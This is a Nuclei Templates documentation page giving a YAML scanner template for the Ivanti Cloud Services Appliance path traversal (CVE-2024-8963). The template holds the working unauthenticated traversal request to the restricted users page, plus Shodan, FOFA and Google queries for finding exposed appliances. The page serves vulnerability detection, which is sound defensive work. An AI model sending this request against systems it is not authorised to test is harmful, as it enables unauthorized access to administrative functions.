Skip to content
Nuclei Templates

Ivanti Cloud Services Appliance - Path Traversal

ID: CVE-2024-8963

Severity: critical

Author: johnk3r

Tags: cve,cve2024,ivanti,kev

Description

Section titled “Description”

Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.

YAML Source

Section titled “YAML Source”
id: CVE-2024-8963


info:
  name: Ivanti Cloud Services Appliance - Path Traversal
  author: johnk3r
  severity: critical
  description: |
    Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.
  reference:
    - https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa
    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8963
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-8963
    cwe-id: CWE-22
    epss-score: 0.30991
    epss-percentile: 0.97075
    cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:4.6:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ivanti
    product: endpoint_manager_cloud_services_appliance
    shodan-query:
      - http.title:"cloud services appliance"
      - http.title:"landesk(r) cloud services appliance"
    fofa-query: title="landesk(r) cloud services appliance"
    google-query: intitle:"landesk(r) cloud services appliance"
  tags: cve,cve2024,ivanti,kev


http:
  - method: GET
    path:
      - "{{BaseURL}}/client/index.php%3F.php/gsb/users.php"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Ivanti Cloud Services Appliance"
          - "User name"
          - "Set Password"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ca9f9efd566ab0b23f89c9762533e6a25d3a86070607b5eb4a2cd9447a0fb7e602207bc81db6e39898b2859dd2dbf730076e865c132dae217e5c248cb033b8a5e7af:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-8963.yaml"

View on Github